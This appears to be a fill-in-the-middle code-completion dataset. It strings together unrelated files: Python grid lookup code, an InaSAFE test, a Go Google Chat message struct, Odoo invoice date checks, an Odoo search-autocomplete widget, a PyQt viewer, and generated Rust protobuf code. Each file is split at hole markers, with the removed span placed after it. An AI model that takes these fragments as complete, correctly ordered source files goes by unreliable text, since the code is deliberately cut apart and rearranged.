def get_square_for_point(self, x, y) -> Optional[str]:
pass
@abstractmethod
def get_squares_for_bounds(self, bounds) -> Optional[str]:
pass
class Grid(AbstractGrid):
enabled = True
def __init__(self, rows, cols):
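        # grid lines arrive as coordinate strings; sort them and detect whether
        # the original order was descending (an inverted axis)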
rows = tuple(float(y) for y in rows)
cols = tuple(float(x) for x in cols)
self.rows = tuple(sorted(rows))
self.cols = tuple(sorted(cols))
if self.rows == rows:
self.invert_y = False
elif self.rows == tuple(reversed(rows)):
self.invert_y = True
else:
raise ValueError('row coordinates are not ordered')
if self.cols == cols:
self.invert_x = False
elif self.cols == tuple(reversed(cols)):
self.invert_x = True
else:
raise ValueError('column coordinates are not ordered')
def get_square_for_point(self, x, y):
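        # bisect yields a 1-based cell index; 0 or len() means the point falls
        # outside the outermost grid lines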
x = bisect.bisect(self.cols, x)
if x <= 0 or x >= len(self.cols):
return None
y = bisect.bisect(self.rows, y)
if y <= 0 or y >= len(self.rows):
return None
if self.invert_x:
x = len(self.cols) - x
if self.invert_y:
y = len(self.rows) - y
return '%s%d' % (string.ascii_uppercase[x-1], y)
def get_squares_for_bounds(self, bounds):
minx, miny, maxx, maxy = bounds
if self.invert_x:
minx, maxx = maxx, minx
if self.invert_y:
miny, maxy = maxy, miny
min_square = self.get_square_for_point(minx, miny)
max_square = self.get_square_for_point(maxx, maxy)
if not min_square or not max_square:
return None
if min_square == max_square:
return min_square
return '%s-%s' % (min_square, max_square)
class DummyGrid(AbstractGrid):
def get_square_for_point(self, x, y):<|fim▁hole|>
def get_squares_for_bounds(self, bounds):
return None
if settings.GRID_COLS and settings.GRID_ROWS:
grid = Grid(settings.GRID_ROWS.split(','), settings.GRID_COLS.split(','))
else:
grid = DummyGrid()<|fim▁end|> | return None |
<|file_name|>test_hazard_metadata.py<|end_file_name|><|fim▁begin|># coding=utf-8<|fim▁hole|>
from safe.common.utilities import unique_filename
from safe.metadata import HazardLayerMetadata
__copyright__ = "Copyright 2016, The InaSAFE Project"
__license__ = "GPL version 3"
__email__ = "[email protected]"
__revision__ = '$Format:%H$'
class TestHazardMetadata(TestCase):
def test_standard_properties(self):
metadata = HazardLayerMetadata(unique_filename())
with self.assertRaises(KeyError):
metadata.get_property('non_existing_key')
# from BaseMetadata
metadata.get_property('email')
# from HazardLayerMetadata
metadata.get_property('hazard')
metadata.get_property('hazard_category')
metadata.get_property('continuous_hazard_unit')
metadata.get_property('thresholds')
metadata.get_property('value_maps')<|fim▁end|> | """Test Hazard Metadata."""
from unittest import TestCase |
<|file_name|>chat_msg.go<|end_file_name|><|fim▁begin|>package googlechat
import "time"
// ChatMessage is message type from Pub/Sub events
type ChatMessage struct {
Type string `json:"type"`
EventTime time.Time `json:"eventTime"`
Token string `json:"token"`
Message struct {
Name string `json:"name"`
Sender struct {
Name string `json:"name"`
DisplayName string `json:"displayName"`
AvatarURL string `json:"avatarUrl"`
Email string `json:"email"`
Type string `json:"type"`
} `json:"sender"`
CreateTime time.Time `json:"createTime"`
Text string `json:"text"`
Thread struct {
Name string `json:"name"`
RetentionSettings struct {
State string `json:"state"`
} `json:"retentionSettings"`
} `json:"thread"`
Space struct {
Name string `json:"name"`
Type string `json:"type"`
} `json:"space"`
ArgumentText string `json:"argumentText"`
} `json:"message"`
User struct {
Name string `json:"name"`
DisplayName string `json:"displayName"`
AvatarURL string `json:"avatarUrl"`
Email string `json:"email"`
Type string `json:"type"`
} `json:"user"`
Space struct {
Name string `json:"name"`
Type string `json:"type"`
DisplayName string `json:"displayName"`
} `json:"space"`
ConfigCompleteRedirectURL string `json:"configCompleteRedirectUrl"`
}
<|fim▁hole|>// ReplyThread is a part of reply messages
type ReplyThread struct {
Name string `json:"name,omitempty"`
}
// ReplyMessage is partial hangouts format of messages used
// For details see
// https://developers.google.com/hangouts/chat/reference/rest/v1/spaces.messages#Message
type ReplyMessage struct {
Text string `json:"text"`
Thread *ReplyThread `json:"thread,omitempty"`
}<|fim▁end|> | |
<|file_name|>account_invoice.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# © 2013-2016 Akretion (Alexis de Lattre <[email protected]>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError, UserError
class AccountInvoiceLine(models.Model):
_inherit = 'account.invoice.line'
start_date = fields.Date('Start Date')
end_date = fields.Date('End Date')
must_have_dates = fields.Boolean(
related='product_id.must_have_dates', readonly=True)
@api.multi
@api.constrains('start_date', 'end_date')
def _check_start_end_dates(self):
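        """Both dates must be set together and start_date must be on or before end_date."""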
for invline in self:
if invline.start_date and not invline.end_date:
raise ValidationError(
_("Missing End Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and not invline.start_date:
raise ValidationError(
_("Missing Start Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and invline.start_date and \
invline.start_date > invline.end_date:
raise ValidationError(
_("Start Date should be before or be the same as "
"End Date for invoice line with Description '%s'.")
% (invline.name))
            # Note: we can't check here that lines whose product has
            # must_have_dates=True actually carry start_date and end_date,
            # because it would block automatic invoice generation/import.
            # The check is instead done upon validation of the invoice
            # (see action_move_create below).
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
def inv_line_characteristic_hashcode(self, invoice_line):
"""Add start and end dates to hashcode used when the option "Group
Invoice Lines" is active on the Account Journal"""
code = super(AccountInvoice, self).inv_line_characteristic_hashcode(
invoice_line)
hashcode = '%s-%s-%s' % (
code,
invoice_line.get('start_date', 'False'),
invoice_line.get('end_date', 'False'),
)
return hashcode
@api.model
def line_get_convert(self, line, part):
"""Copy from invoice to move lines"""
res = super(AccountInvoice, self).line_get_convert(line, part)
res['start_date'] = line.get('start_date', False)
res['end_date'] = line.get('end_date', False)
return res
@api.model
def invoice_line_move_line_get(self):<|fim▁hole|> iline = ailo.browse(move_line_dict['invl_id'])
move_line_dict['start_date'] = iline.start_date
move_line_dict['end_date'] = iline.end_date
return res
@api.multi
def action_move_create(self):
"""Check that products with must_have_dates=True have
Start and End Dates"""
for invoice in self:
for iline in invoice.invoice_line_ids:
if iline.product_id and iline.product_id.must_have_dates:
if not iline.start_date or not iline.end_date:
raise UserError(_(
"Missing Start Date and End Date for invoice "
"line with Product '%s' which has the "
"property 'Must Have Start and End Dates'.")
% (iline.product_id.name))
return super(AccountInvoice, self).action_move_create()<|fim▁end|> | """Copy from invoice line to move lines"""
res = super(AccountInvoice, self).invoice_line_move_line_get()
ailo = self.env['account.invoice.line']
for move_line_dict in res: |
<|file_name|>000.js<|end_file_name|><|fim▁begin|>odoo.define('website_sale.s_products_searchbar', function (require) {
'use strict';
const concurrency = require('web.concurrency');
const publicWidget = require('web.public.widget');
const { qweb } = require('web.core');<|fim▁hole|>publicWidget.registry.productsSearchBar = publicWidget.Widget.extend({
selector: '.o_wsale_products_searchbar_form',
xmlDependencies: ['/website_sale/static/src/xml/website_sale_utils.xml'],
events: {
'input .search-query': '_onInput',
'focusout': '_onFocusOut',
'keydown .search-query': '_onKeydown',
},
autocompleteMinWidth: 300,
/**
* @constructor
*/
init: function () {
this._super.apply(this, arguments);
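        // DropPrevious discards stale autocomplete responses; debouncing limits RPC calls while typing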
this._dp = new concurrency.DropPrevious();
this._onInput = _.debounce(this._onInput, 400);
this._onFocusOut = _.debounce(this._onFocusOut, 100);
},
/**
* @override
*/
start: function () {
this.$input = this.$('.search-query');
this.order = this.$('.o_wsale_search_order_by').val();
this.limit = parseInt(this.$input.data('limit'));
this.displayDescription = !!this.$input.data('displayDescription');
this.displayPrice = !!this.$input.data('displayPrice');
this.displayImage = !!this.$input.data('displayImage');
if (this.limit) {
this.$input.attr('autocomplete', 'off');
}
return this._super.apply(this, arguments);
},
//--------------------------------------------------------------------------
// Private
//--------------------------------------------------------------------------
/**
* @private
*/
_fetch: function () {
return this._rpc({
route: '/shop/products/autocomplete',
params: {
'term': this.$input.val(),
'options': {
'order': this.order,
'limit': this.limit,
'display_description': this.displayDescription,
'display_price': this.displayPrice,
'max_nb_chars': Math.round(Math.max(this.autocompleteMinWidth, parseInt(this.$el.width())) * 0.22),
},
},
});
},
/**
* @private
*/
_render: function (res) {
var $prevMenu = this.$menu;
this.$el.toggleClass('dropdown show', !!res);
if (res) {
var products = res['products'];
this.$menu = $(qweb.render('website_sale.productsSearchBar.autocomplete', {
products: products,
hasMoreProducts: products.length < res['products_count'],
currency: res['currency'],
widget: this,
}));
this.$menu.css('min-width', this.autocompleteMinWidth);
this.$el.append(this.$menu);
}
if ($prevMenu) {
$prevMenu.remove();
}
},
//--------------------------------------------------------------------------
// Handlers
//--------------------------------------------------------------------------
/**
* @private
*/
_onInput: function () {
if (!this.limit) {
return;
}
this._dp.add(this._fetch()).then(this._render.bind(this));
},
/**
* @private
*/
_onFocusOut: function () {
if (!this.$el.has(document.activeElement).length) {
this._render();
}
},
/**
* @private
*/
_onKeydown: function (ev) {
switch (ev.which) {
case $.ui.keyCode.ESCAPE:
this._render();
break;
case $.ui.keyCode.UP:
case $.ui.keyCode.DOWN:
ev.preventDefault();
if (this.$menu) {
let $element = ev.which === $.ui.keyCode.UP ? this.$menu.children().last() : this.$menu.children().first();
$element.focus();
}
break;
}
},
});
});<|fim▁end|> |
/**
 * @todo maybe the custom autocomplete logic could be extracted to make it reusable
*/ |
<|file_name|>dependency_viewer.py<|end_file_name|><|fim▁begin|># Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington<|fim▁hole|>from PyQt4 import QtGui, Qt, QtCore
from opus_gui.general_manager.views.ui_dependency_viewer import Ui_DependencyViewer
class DependencyViewer(QtGui.QDialog, Ui_DependencyViewer):
def __init__(self, parent_window):
flags = QtCore.Qt.WindowTitleHint | QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowMaximizeButtonHint
QtGui.QDialog.__init__(self, parent_window, flags)
self.setupUi(self)
self.setModal(True) #TODO: this shouldn't be necessary, but without it the window is unresponsive
def show_error_message(self):
self.lbl_error.setVisible(True)
self.scrollArea.setVisible(False)
def show_graph(self, file_path, name):
self.lbl_error.setVisible(False)
self.scrollArea.setVisible(True)
self.setWindowTitle("Dependency graph of %s" % name)
self.image_file = file_path
pix = QtGui.QPixmap.fromImage(QtGui.QImage(file_path))
self.label.setPixmap(pix)
self.scrollAreaWidgetContents.setMinimumSize(pix.width(), pix.height())
self.label.setMinimumSize(pix.width(), pix.height())
rect = Qt.QApplication.desktop().screenGeometry(self)
self.resize(min(rect.width(), pix.width() + 35), min(rect.height(), pix.height() + 80))
self.update()
def on_closeWindow_released(self):
self.close()
os.remove(self.image_file)<|fim▁end|> | # See opus_core/LICENSE
import os |
<|file_name|>perftest_data.rs<|end_file_name|><|fim▁begin|>// This file is generated. Do not edit
#![allow(dead_code)]
#![allow(non_camel_case_types)]
#![allow(non_upper_case_globals)]
#![allow(unused_imports)]
use protobuf::Message as Message_imported_for_functions;
use protobuf::ProtobufEnum as ProtobufEnum_imported_for_functions;
#[derive(Clone,Default)]
pub struct Test1 {
// message fields
value: ::std::option::Option<i32>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl Test1 {
pub fn new() -> Test1 {
::std::default::Default::default()
}
pub fn default_instance() -> &'static Test1 {
static mut instance: ::protobuf::lazy::Lazy<Test1> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const Test1,
};
unsafe {
instance.get(|| {
Test1 {
value: ::std::option::Option::None,
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// optional int32 value = 1;
pub fn clear_value(&mut self) {
self.value = ::std::option::Option::None;
}
pub fn has_value(&self) -> bool {
self.value.is_some()
}
// Param is passed by value, moved
pub fn set_value(&mut self, v: i32) {
self.value = ::std::option::Option::Some(v);
}
pub fn get_value<'a>(&self) -> i32 {
self.value.unwrap_or(0)
}
}
impl ::protobuf::Message for Test1 {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
if wire_type != ::protobuf::wire_format::WireTypeVarint {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = try!(is.read_int32());
self.value = ::std::option::Option::Some(tmp);
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.value.iter() {
my_size += ::protobuf::rt::value_size(1, *value, ::protobuf::wire_format::WireTypeVarint);
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
if let Some(v) = self.value {
try!(os.write_int32(1, v));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<Test1>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for Test1 {
fn new() -> Test1 {
Test1::new()
}
fn descriptor_static(_: ::std::option::Option<Test1>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_singular_i32_accessor(
"value",
Test1::has_value,
Test1::get_value,
));
::protobuf::reflect::MessageDescriptor::new::<Test1>(
"Test1",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for Test1 {
fn clear(&mut self) {
self.clear_value();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for Test1 {
fn eq(&self, other: &Test1) -> bool {
self.value == other.value &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for Test1 {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestRepeatedBool {
// message fields
values: ::std::vec::Vec<bool>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestRepeatedBool {
pub fn new() -> TestRepeatedBool {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestRepeatedBool {
static mut instance: ::protobuf::lazy::Lazy<TestRepeatedBool> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestRepeatedBool,
};
unsafe {
instance.get(|| {
TestRepeatedBool {
values: ::std::vec::Vec::new(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// repeated bool values = 1;
pub fn clear_values(&mut self) {
self.values.clear();
}
// Param is passed by value, moved
pub fn set_values(&mut self, v: ::std::vec::Vec<bool>) {
self.values = v;
}
// Mutable pointer to the field.
pub fn mut_values<'a>(&'a mut self) -> &'a mut ::std::vec::Vec<bool> {
&mut self.values
}
// Take field
pub fn take_values(&mut self) -> ::std::vec::Vec<bool> {
::std::mem::replace(&mut self.values, ::std::vec::Vec::new())
}
pub fn get_values<'a>(&'a self) -> &'a [bool] {
&self.values
}
}
impl ::protobuf::Message for TestRepeatedBool {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
try!(::protobuf::rt::read_repeated_bool_into(wire_type, is, &mut self.values));
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
my_size += 2 * self.values.len() as u32;
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
for v in self.values.iter() {
try!(os.write_bool(1, *v));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestRepeatedBool>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestRepeatedBool {
fn new() -> TestRepeatedBool {
TestRepeatedBool::new()
}
fn descriptor_static(_: ::std::option::Option<TestRepeatedBool>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_repeated_bool_accessor(
"values",
TestRepeatedBool::get_values,
));
::protobuf::reflect::MessageDescriptor::new::<TestRepeatedBool>(
"TestRepeatedBool",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestRepeatedBool {
fn clear(&mut self) {
self.clear_values();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestRepeatedBool {
fn eq(&self, other: &TestRepeatedBool) -> bool {
self.values == other.values &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestRepeatedBool {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestRepeatedPackedInt32 {
// message fields
values: ::std::vec::Vec<i32>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestRepeatedPackedInt32 {
pub fn new() -> TestRepeatedPackedInt32 {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestRepeatedPackedInt32 {
static mut instance: ::protobuf::lazy::Lazy<TestRepeatedPackedInt32> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestRepeatedPackedInt32,
};
unsafe {
instance.get(|| {
TestRepeatedPackedInt32 {
values: ::std::vec::Vec::new(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// repeated int32 values = 1;
pub fn clear_values(&mut self) {
self.values.clear();
}
// Param is passed by value, moved
pub fn set_values(&mut self, v: ::std::vec::Vec<i32>) {
self.values = v;
}
// Mutable pointer to the field.
pub fn mut_values<'a>(&'a mut self) -> &'a mut ::std::vec::Vec<i32> {
&mut self.values
}
// Take field
pub fn take_values(&mut self) -> ::std::vec::Vec<i32> {
::std::mem::replace(&mut self.values, ::std::vec::Vec::new())
}
pub fn get_values<'a>(&'a self) -> &'a [i32] {
&self.values
}
}
impl ::protobuf::Message for TestRepeatedPackedInt32 {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
try!(::protobuf::rt::read_repeated_int32_into(wire_type, is, &mut self.values));
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
if !self.values.is_empty() {
my_size += ::protobuf::rt::vec_packed_varint_size(1, &self.values);
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
if !self.values.is_empty() {
try!(os.write_tag(1, ::protobuf::wire_format::WireTypeLengthDelimited));
// TODO: Data size is computed again, it should be cached
try!(os.write_raw_varint32(::protobuf::rt::vec_packed_varint_data_size(&self.values)));
for v in self.values.iter() {
try!(os.write_int32_no_tag(*v));
};
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestRepeatedPackedInt32>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestRepeatedPackedInt32 {
fn new() -> TestRepeatedPackedInt32 {
TestRepeatedPackedInt32::new()
}
fn descriptor_static(_: ::std::option::Option<TestRepeatedPackedInt32>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_repeated_i32_accessor(
"values",
TestRepeatedPackedInt32::get_values,
));
::protobuf::reflect::MessageDescriptor::new::<TestRepeatedPackedInt32>(
"TestRepeatedPackedInt32",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestRepeatedPackedInt32 {
fn clear(&mut self) {
self.clear_values();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestRepeatedPackedInt32 {
fn eq(&self, other: &TestRepeatedPackedInt32) -> bool {
self.values == other.values &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestRepeatedPackedInt32 {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestRepeatedMessages {
// message fields
messages1: ::protobuf::RepeatedField<TestRepeatedMessages>,
messages2: ::protobuf::RepeatedField<TestRepeatedMessages>,
messages3: ::protobuf::RepeatedField<TestRepeatedMessages>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestRepeatedMessages {
pub fn new() -> TestRepeatedMessages {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestRepeatedMessages {
static mut instance: ::protobuf::lazy::Lazy<TestRepeatedMessages> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestRepeatedMessages,
};
unsafe {
instance.get(|| {
TestRepeatedMessages {
messages1: ::protobuf::RepeatedField::new(),
messages2: ::protobuf::RepeatedField::new(),
messages3: ::protobuf::RepeatedField::new(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// repeated .TestRepeatedMessages messages1 = 1;
pub fn clear_messages1(&mut self) {
self.messages1.clear();
}
// Param is passed by value, moved
pub fn set_messages1(&mut self, v: ::protobuf::RepeatedField<TestRepeatedMessages>) {
self.messages1 = v;
}
// Mutable pointer to the field.
pub fn mut_messages1<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedMessages> {
&mut self.messages1
}
// Take field
pub fn take_messages1(&mut self) -> ::protobuf::RepeatedField<TestRepeatedMessages> {
::std::mem::replace(&mut self.messages1, ::protobuf::RepeatedField::new())
}
pub fn get_messages1<'a>(&'a self) -> &'a [TestRepeatedMessages] {
&self.messages1
}
// repeated .TestRepeatedMessages messages2 = 2;
pub fn clear_messages2(&mut self) {
self.messages2.clear();
}
// Param is passed by value, moved
pub fn set_messages2(&mut self, v: ::protobuf::RepeatedField<TestRepeatedMessages>) {
self.messages2 = v;
}
// Mutable pointer to the field.
pub fn mut_messages2<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedMessages> {
&mut self.messages2
}
// Take field
pub fn take_messages2(&mut self) -> ::protobuf::RepeatedField<TestRepeatedMessages> {
::std::mem::replace(&mut self.messages2, ::protobuf::RepeatedField::new())
}
pub fn get_messages2<'a>(&'a self) -> &'a [TestRepeatedMessages] {
&self.messages2
}
// repeated .TestRepeatedMessages messages3 = 3;
pub fn clear_messages3(&mut self) {
self.messages3.clear();
}
// Param is passed by value, moved
pub fn set_messages3(&mut self, v: ::protobuf::RepeatedField<TestRepeatedMessages>) {
self.messages3 = v;
}
// Mutable pointer to the field.
pub fn mut_messages3<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedMessages> {
&mut self.messages3
}
// Take field
pub fn take_messages3(&mut self) -> ::protobuf::RepeatedField<TestRepeatedMessages> {
::std::mem::replace(&mut self.messages3, ::protobuf::RepeatedField::new())
}
pub fn get_messages3<'a>(&'a self) -> &'a [TestRepeatedMessages] {
&self.messages3
}
}
impl ::protobuf::Message for TestRepeatedMessages {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.messages1));
},
2 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.messages2));
},
3 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.messages3));
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.messages1.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.messages2.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.messages3.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
for v in self.messages1.iter() {
try!(os.write_tag(1, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.messages2.iter() {
try!(os.write_tag(2, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.messages3.iter() {
try!(os.write_tag(3, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestRepeatedMessages>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestRepeatedMessages {
fn new() -> TestRepeatedMessages {
TestRepeatedMessages::new()
}
fn descriptor_static(_: ::std::option::Option<TestRepeatedMessages>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
